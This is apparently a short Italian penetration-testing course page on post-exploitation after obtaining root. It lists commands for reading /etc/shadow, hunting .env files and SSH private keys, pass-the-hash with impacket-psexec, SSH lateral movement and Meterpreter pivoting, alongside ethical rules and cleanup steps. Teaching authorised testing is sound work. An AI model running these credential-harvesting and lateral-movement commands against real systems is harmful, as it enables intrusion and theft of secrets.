Cosa Fare Dopo il Root
Sei root o SYSTEM. La post-exploitation dimostra l'impatto reale al cliente.
Raccolta Prove
id && hostname && date && ip addr
cat /etc/shadow
find / -name ".env" 2>/dev/null | head -20
Lateral Movement
# Pass-the-Hash:
impacket-psexec -hashes :NTLM_HASH [email protected]
# SSH con chiavi trovate:
find / -name "id_rsa" 2>/dev/null
ssh -i id_rsa user@altro-server
# Pivoting:
meterpreter > run post/multi/manage/autoroute
Regole Etiche
- Non modificare o cancellare dati reali
- Non esfiltrare dati sensibili
- Documenta ogni azione
- Rimuovi tutti gli strumenti a fine test
Cleanup
userdel -r test_user
rm /tmp/linpeas.sh /tmp/tools/*
Conclusione
Modulo finale: scrivere il report professionale.
Nessun commento ancora. Sii il primo!